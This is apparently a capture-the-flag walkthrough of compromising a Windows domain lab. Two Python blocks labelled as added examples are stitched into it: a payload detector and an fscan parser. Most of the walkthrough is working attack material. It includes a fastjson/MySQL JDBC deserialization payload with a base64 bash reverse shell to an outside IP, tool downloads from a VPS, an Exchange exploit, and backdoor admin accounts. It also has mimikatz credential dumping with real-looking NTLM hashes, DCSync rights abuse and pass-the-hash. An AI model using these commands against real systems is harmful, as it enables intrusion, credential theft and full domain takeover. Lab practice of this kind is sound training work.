flag1

fscan64 -h 39.99.245.230
F:\渗透工具\fscan>fscan64 -h 39.99.136.97

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.99.136.97    is alive
[*] Icmp alive hosts len is: 1
39.99.136.97:8000 open
39.99.136.97:22 open
39.99.136.97:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://39.99.136.97       code:200 len:19813  title:lumia
[*] WebTitle: http://39.99.136.97:8000  code:302 len:0      title:None 跳转url: http://39.99.136.97:8000/login.html
[*] WebTitle: http://39.99.136.97:8000/login.html code:200 len:5662   title:Lumia ERP

Go after port 8000; log in with admin/123456.

It's 华夏ERP. Looking for known vulnerabilities, it can be attacked through JDBC.

The vulnerable spot is here; follow this article to exploit it:

fastjson deserialization: MySQL JDBC exploitation (隐形卟's blog, CSDN)

http://39.99.231.160:8000/user/list?search=

Download the MySQL fake server for this.

Edit config.json:

{
    "config":{
        "ysoserialPath":"ysoserial-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
         "Jdk7u21":["Jdk7u21","calc"],
         "CommonsCollections6":["CommonCollections6","bash -c {echo,YmFzaCAtaSAmIC9kZXYvdGNwLzQ5LjIzMy4xMjEuNTMvNTQ=}|{base64,-d}|{bash,-i}"]
    }
}

Payload

Reverse shell:

bash -i >& /dev/tcp/ip/54 0>&1
{
	"name": {
		"@type": "java.lang.AutoCloseable",
		"@type": "com.mysql.jdbc.JDBC4Connection",
		"hostToConnectTo": "vps",
		"portToConnectTo": 88,
		"info": {
			"user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2..0IDA+JjE=}|{base64,-d}|{bash,-i}",
			"password": "pass",
			"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
			"autoDeserialize": "true",
			"NUM_HOSTS": "1"
		}
	}
}

URL-encode it in Burp and send it.
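A detector for the payload shape above, written from the defender's side: it decodes the `search` parameter, parses the JSON while keeping duplicate keys (so both `@type` entries are seen), and flags the autoType and MySQL Connector/J indicators. This is an added example, not code from the write-up or the referenced article; `erp.example` and `vps.example` are constructed placeholders.

```python
"""Flag fastjson autoType -> MySQL JDBC deserialization payloads in a request.

Added example (not from the write-up). Parses the `search` query parameter the
way /user/list?search= would receive it, keeping duplicate JSON keys so that
both @type entries of the payload are seen, then reports the indicators.
"""
import json
from urllib.parse import parse_qs, quote, urlsplit


class Pairs(list):
    """JSON object kept as an ordered list of (key, value) pairs.

    json.loads into a plain dict silently keeps only the LAST duplicate key,
    so the leading "@type": "java.lang.AutoCloseable" would be lost; fastjson
    processes both, so a detector has to see both too.
    """


# Connector/J connection classes and the properties that make the connection
# deserialize server-supplied data (names as used in the payload above).
JDBC_CLASSES = ("com.mysql.jdbc.", "com.mysql.cj.jdbc.")
DANGEROUS_PROPS = {
    "autoDeserialize": lambda v: str(v).lower() == "true",
    "statementInterceptors": lambda v: "ServerStatusDiffInterceptor" in str(v),
    "queryInterceptors": lambda v: "ServerStatusDiffInterceptor" in str(v),
}


def walk(node, path, findings):
    """Recursively collect (kind, json_path, detail) tuples from parsed JSON."""
    if isinstance(node, Pairs):
        for key, value in node:
            here = f"{path}.{key}" if path else key
            if key == "@type":
                findings.append(("autotype", here, str(value)))
                if str(value).startswith(JDBC_CLASSES):
                    findings.append(("jdbc_class", here, str(value)))
            elif key in DANGEROUS_PROPS and DANGEROUS_PROPS[key](value):
                findings.append(("jdbc_prop", here, f"{key}={value}"))
            elif isinstance(value, str) and value.startswith("yso_"):
                # The fake MySQL server picks its ysoserial gadget from the user name.
                findings.append(("ysoserial_user", here, value))
            walk(value, here, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            walk(item, f"{path}[{i}]", findings)


def inspect_search_param(url):
    """Return (verdict, findings) for the `search` parameter of a request URL."""
    raw = parse_qs(urlsplit(url).query).get("search", [""])[0]
    try:
        doc = json.loads(raw, object_pairs_hook=Pairs)
    except ValueError:
        return "not-json", []
    findings = []
    walk(doc, "", findings)
    kinds = {kind for kind, _, _ in findings}
    if "jdbc_class" in kinds and "jdbc_prop" in kinds:
        return "jdbc-deserialization", findings
    if "autotype" in kinds:
        return "autotype-present", findings
    return "clean", findings


# Constructed sample request: the payload shape from the write-up, URL-encoded
# as Burp would send it. "vps.example" and "erp.example" are placeholders.
SAMPLE_PAYLOAD = (
    '{"name":{"@type":"java.lang.AutoCloseable",'
    '"@type":"com.mysql.jdbc.JDBC4Connection",'
    '"hostToConnectTo":"vps.example","portToConnectTo":88,'
    '"info":{"user":"yso_CommonsCollections6_calc","password":"pass",'
    '"statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",'
    '"autoDeserialize":"true","NUM_HOSTS":"1"}}}'
)
SAMPLE_URL = "http://erp.example/user/list?search=" + quote(SAMPLE_PAYLOAD)
BENIGN_URL = "http://erp.example/user/list?search=" + quote('{"name":"alice"}')

if __name__ == "__main__":
    for url in (SAMPLE_URL, BENIGN_URL):
        verdict, found = inspect_search_param(url)
        print(verdict)
        for kind, where, detail in found:
            print(f"  {kind:15} {where}: {detail}")
```

The same walk can be run over a request log to find which `search=` values carried an `@type` key at all, which is the cheaper signal when the gadget changes.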

That gives the first flag.

flag2

Upload the tools:

wget http://vps:port/frpc
wget http://vps:port/frpc.ini
wget http://vps:port/fscan

./fscan -h 172.22.3.12/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.3.12     is alive
(icmp) Target 172.22.3.2      is alive
(icmp) Target 172.22.3.9      is alive
(icmp) Target 172.22.3.26     is alive
[*] Icmp alive hosts len is: 4
172.22.3.12:8000 open
172.22.3.9:8172 open
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.26:139 open
172.22.3.9:139 open
172.22.3.2:139 open
172.22.3.26:135 open
172.22.3.9:135 open
172.22.3.2:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.9:808 open
172.22.3.2:88 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo:
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] NetInfo:
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] WebTitle: http://172.22.3.12        code:200 len:19813  title:lumia
[*] NetBios: 172.22.3.2      [+]DC XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393 
[*] 172.22.3.2  (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.3.26     XIAORANG\XIAORANG-PC           
[*] WebTitle: http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] NetInfo:
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] NetBios: 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         LWindows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle: http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle: https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook
已完成 18/18
[*] 扫描结束,耗时: 17.743568947s

Summarising:

172.22.3.12 this host (foothold)
172.22.3.2 XIAORANG-WIN16 DC
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.26 XIAORANG-PC
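The host table above can be produced directly from fscan's output instead of by hand. This is an added example, not code from fscan or from the write-up; the regexes match the fscan 1.8.2 line formats printed on this page, the Exchange role is inferred from the /owa/ redirect or an Outlook title, and the sample is a constructed subset of the scan lines shown above.

```python
"""Build the host/role table above from fscan output.

Added example, not from fscan or the write-up. The regexes match the fscan
1.8.2 line formats shown on this page; the sample is a constructed subset of
those lines. Exchange is inferred from an /owa/ redirect or an Outlook title.
"""
import re
from collections import defaultdict

ALIVE = re.compile(r"^\(icmp\) Target (\S+)\s+is alive")
PORT = re.compile(r"^(\d+\.\d+\.\d+\.\d+):(\d+) open")
NETBIOS = re.compile(r"^\[\*\] NetBios: (\S+)\s+(\[\+\]DC )?(\S+)")
NETINFO_IP = re.compile(r"^\[\*\](\d+\.\d+\.\d+\.\d+)$")
NETINFO_NAME = re.compile(r"^\s+\[->\](\S+)$")
WEBTITLE = re.compile(
    r"^\[\*\] WebTitle: (https?://([^/:\s]+))(\S*)\s+code:(\d+).*title:(.*)$")
IPV4 = re.compile(r"^\d+\.\d+\.\d+\.\d+$")

SAMPLE = r"""(icmp) Target 172.22.3.12     is alive
172.22.3.12:8000 open
172.22.3.9:8172 open
172.22.3.26:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.2:88 open
[*] NetInfo:
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] NetBios: 172.22.3.2      [+]DC XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.3.26     XIAORANG\XIAORANG-PC
[*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] WebTitle: https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook
"""


def parse_fscan(text):
    """Return {ip: {"name", "roles", "ports", "web"}} from fscan output."""
    hosts = defaultdict(lambda: {"name": None, "roles": set(), "ports": [], "web": []})
    current = None  # IP of the NetInfo block currently being read
    for line in text.splitlines():
        if m := ALIVE.match(line):
            hosts[m.group(1)]  # register the host even if no port is open
        elif m := PORT.match(line):
            hosts[m.group(1)]["ports"].append(int(m.group(2)))
        elif m := NETBIOS.match(line):
            ip, is_dc, name = m.groups()
            # Strip DOMAIN\ prefix and DNS suffix: XIAORANG\PC, PC.xiaorang.lab -> PC
            hosts[ip]["name"] = name.split("\\")[-1].split(".")[0]
            if is_dc:
                hosts[ip]["roles"].add("DC")
        elif m := NETINFO_IP.match(line):
            current = m.group(1)
        elif current and (m := NETINFO_NAME.match(line)):
            if not IPV4.match(m.group(1)):  # NetInfo lists both name and IP
                hosts[current]["name"] = hosts[current]["name"] or m.group(1)
        elif m := WEBTITLE.match(line):
            url, ip, path, code, title = m.groups()
            hosts[ip]["web"].append((url + path, int(code), title.strip()))
            if "/owa/" in path + title or "Outlook" in title:
                hosts[ip]["roles"].add("Exchange")
    return dict(hosts)


def summarise(hosts, local_ip=None):
    """Rows of (ip, name, roles, sorted ports), numerically ordered by IP."""
    rows = []
    for ip in sorted(hosts, key=lambda a: tuple(int(o) for o in a.split("."))):
        h = hosts[ip]
        roles = sorted(h["roles"])
        if ip == local_ip:
            roles.insert(0, "foothold")
        rows.append((ip, h["name"] or "?", ",".join(roles) or "-", sorted(h["ports"])))
    return rows


if __name__ == "__main__":
    for ip, name, roles, ports in summarise(parse_fscan(SAMPLE), local_ip="172.22.3.12"):
        print(f"{ip:<14} {name:<16} {roles:<10} {ports}")
```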

Set up a proxy.

On the VPS:

./frps -c frps.ini

On the target:

./frpc -c frpc.ini

Go after 172.22.3.9, which has Outlook (OWA):

https://172.22.3.9/owa/

Hit it with the exploit directly, guessing the mail domain is xiaorang.lab:

proxychains python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab

Then add a user:

net user test Abcd1234 /add
net localgroup administrators test /add

Connect over remote desktop and get the flag.

flag4

Upload mimikatz and dump logon credentials:

mimikatz.exe "privilege::debug" "log sekurlsa::logonpasswords full" exit

Summarising the relevant entries:

Zhangtong
22c7f81993e96ac83ac2f3f1903de8b4

XIAORANG-EXC01$
55808f50f5667934c73c555eab651b32

The Exchange machine account has WriteDACL rights on the domain by default, so it can write DCSync rights.

You can also collect this with BloodHound and see it there.

proxychains python3 bloodyAD.py -d xiaorang.lab -u 'XIAORANG-EXC01$' -p :55808f50f5667934c73c555eab651b32 --host 172.22.3.2 add dcsync Zhangtong

Dump the hashes:

proxychains impacket-secretsdump xiaorang.lab/XIAORANG-EXC01\$@172.22.3.2 -hashes :55808f50f5667934c73c555eab651b32 -just-dc
└─# proxychains impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm

Connect to the DC and get flag04:

proxychains impacket-wmiexec xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2

flag3

The dumped hashes also showed a lumia user; looking back at the earlier summary:

172.22.3.12 this host (foothold)
172.22.3.2 XIAORANG-WIN16 DC
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.26 XIAORANG-PC

so it should be the XIAORANG-PC machine.

Add an administrator user on the DC just taken, then log in to the DC:

net user test2 Abcd1234 /add
net localgroup administrators test2 /add

Once logged in to the DC, reset lumia's password directly.

Set it to:

Abcd1234

Log in over RDP; there is an encrypted archive.

Going through the mailbox reveals that the archive password is a phone number; export the archive and brute-force it to get:

18763918468

That gives the flag.
